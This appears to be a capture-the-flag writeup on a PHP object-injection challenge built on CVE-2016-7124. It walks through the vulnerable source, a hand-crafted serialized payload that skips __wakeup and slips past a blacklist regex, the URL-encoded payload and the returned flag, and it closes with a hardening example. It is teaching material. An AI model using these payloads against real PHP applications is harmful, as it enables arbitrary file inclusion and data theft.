Source
CVE-2016-7124 affects PHP 5 before 5.6.25 and PHP 7 before 7.0.10.
```php
<?php
class Leo {
    var $file = 'index.php';

    public function __construct($file) { $this->file = $file; }

    // Gadget: whatever $file holds is included when the object is destroyed.
    function __destruct() {
        printf("%s\n", __METHOD__);
        include_once($this->file);
        echo $flag;
    }

    // Intended defence: reset $file before the destructor can use it.
    function __wakeup() {
        printf("%s\n", __METHOD__);
        $this->file = 'index.php';
    }
}

$cmd = $_REQUEST['Leo'];
if (!isset($cmd)) {
    echo "Vulnerability detected here, running the attack test\n";
} else {
    // Blacklist filter: rejects "O:<digits>:" / "C:<digits>:" records.
    if (preg_match('/[oc]:\d+:/i', $cmd)) {
        echo "The server detected malicious serialized data and started the scanner\n";
    } else {
        unserialize($cmd);
    }
}
?>
```
POC
```php
<?php
class Leo {
    var $file = 'index.php';
    public function __construct($file) { $this->file = $file; }
}

// Hand-built payload: declared property count 2 (the object has 1) so
// __wakeup is skipped, and "O:+3:" so the "[oc]:\d+:" filter does not match.
echo urlencode('O:+3:"Leo":2:{s:4:"file";s:8:"flag.php";}');
```
Output (the URL-encoded payload):
```
O%3A%2B3%3A%22Leo%22%3A2%3A%7Bs%3A4%3A%22file%22%3Bs%3A8%3A%22flag.php%22%3B%7D
```
Submit the payload as the `Leo` parameter and the response is:
```
Leo::__destruct Sonder{571a973-658c89b3ebb7d-47bc0603c81b}
```
`Leo::__wakeup` is never printed, which confirms that the method was skipped and `$file` stayed at `flag.php`.
- When the property count declared in the serialized string differs from the real number of properties, affected versions build the object, fail while filling it in, and never call `__wakeup`; the half-built object is then dropped, which fires `__destruct` with `$file` still pointing at the attacker-chosen path, so `include_once` runs on it. `unserialize()` returns `false` in both affected and fixed versions; the fix marks the half-built object so that its `__destruct` no longer runs.
- `O:+3:` in place of `O:3:` bypasses the `[oc]:\d+:` check: the text between the two colons is no longer digits only, yet the unserializer still accepts the signed length.
- `urlencode()` the payload so the `+` is sent as `%2B`; otherwise the query-string parser of a GET request decodes a bare `+` as a space and the payload no longer parses.
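The three points above put together as an added example (this is not the writeup's own code, which stops at the hand-built string): it derives the same payload from `serialize()`, checks it against the original filter and a tightened one, shows what `$_GET` decoding does to a raw `+` versus the urlencoded form, and shows the handler rewritten with the `allowed_classes` option of `unserialize()` (PHP 7.0 and later). `Leo` and `flag.php` are the writeup's names; the function names are this example's own.

```php
<?php
// Added example for this writeup (not the challenge's own code): derive the
// CVE-2016-7124 payload from serialize() rather than by hand, show why the
// blacklist regex from the source misses it, show why urlencode() is needed,
// and show the handler hardened with unserialize()'s allowed_classes option.
// Requires PHP >= 7.0 for the allowed_classes option.

class Leo {
    public $file = 'index.php';
    public function __construct($file) { $this->file = $file; }
    // No __wakeup/__destruct here: this script only builds and inspects strings.
}

// Clean serialization of the object the target would build:
//   O:3:"Leo":1:{s:4:"file";s:8:"flag.php";}
function cleanPayload(): string {
    return serialize(new Leo('flag.php'));
}

// Turn the clean string into the bypass payload:
//   - declared property count 1 -> 2 (count != real count, so affected
//     versions skip __wakeup and the file reset never happens);
//   - class-name length 3 -> +3 (the unserializer accepts a leading '+',
//     the blacklist "[oc]:\d+:" does not).
function bypassPayload(string $clean): string {
    return preg_replace_callback(
        '/^O:(\d+):"([^"]+)":(\d+):/',
        function (array $m): string {
            return 'O:+' . $m[1] . ':"' . $m[2] . '":' . ($m[3] + 1) . ':';
        },
        $clean
    );
}

// The filter from the vulnerable source, and a tightened variant that also
// catches the signed length. The tightened regex only closes this one hole;
// a class-name blacklist is not a fix for unserialize() on user input.
function matchesBlacklist(string $data): bool {
    return preg_match('/[oc]:\d+:/i', $data) === 1;
}
function matchesTightened(string $data): bool {
    return preg_match('/[oc]:\+?\d+:/i', $data) === 1;
}

// What the target sees after $_GET/$_REQUEST decoding. urldecode() maps '+'
// to a space, exactly as the query-string parser does, so a raw "O:+3:" in
// the URL arrives as "O: 3:" and fails to parse; urlencode() first turns the
// '+' into %2B so it survives.
function asReceivedByTarget(string $query_value): string {
    return urldecode($query_value);
}

// Hardened handler: allowed_classes=false means any O: record becomes
// __PHP_Incomplete_Class, which has no __wakeup/__destruct, so the
// include_once() gadget in Leo::__destruct can never run, whatever the
// property count says. Safer still is not to unserialize() request data at
// all (json_decode() carries no object gadgets).
function handleHardened(string $data): string {
    $value = @unserialize($data, ['allowed_classes' => false]);
    if ($value === false && $data !== serialize(false)) {
        return 'rejected';
    }
    return is_object($value) ? get_class($value) : gettype($value);
}

$clean   = cleanPayload();
$payload = bypassPayload($clean);

echo "clean:             $clean\n";
echo "payload:           $payload\n";
echo "blacklist hit:     " . var_export(matchesBlacklist($payload), true) . "\n";
echo "tightened hit:     " . var_export(matchesTightened($payload), true) . "\n";
echo "raw + in GET:      " . asReceivedByTarget($payload) . "\n";
echo "urlencoded:        " . urlencode($payload) . "\n";
echo "decoded again:     " . asReceivedByTarget(urlencode($payload)) . "\n";
echo "hardened(clean):   " . handleHardened($clean) . "\n";
echo "hardened(payload): " . handleHardened($payload) . "\n";
```

Run it with `php` on the command line. `bypassPayload()` yields exactly the string the POC hard-codes; `matchesBlacklist()` is false for it while `matchesTightened()` is true; `asReceivedByTarget()` on the raw payload gives `O: 3:"Leo":2:...`, which no longer parses, while the urlencoded form decodes back to the original. `handleHardened()` returns `__PHP_Incomplete_Class` for the clean string and `rejected` for the count-mismatched payload on any PHP 7; in neither case does any user class get instantiated, so `include_once` is unreachable.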
Reference: https://www.yuque.com/shiyizhesonder/sonder39/yp9tmv9a0op0b9tp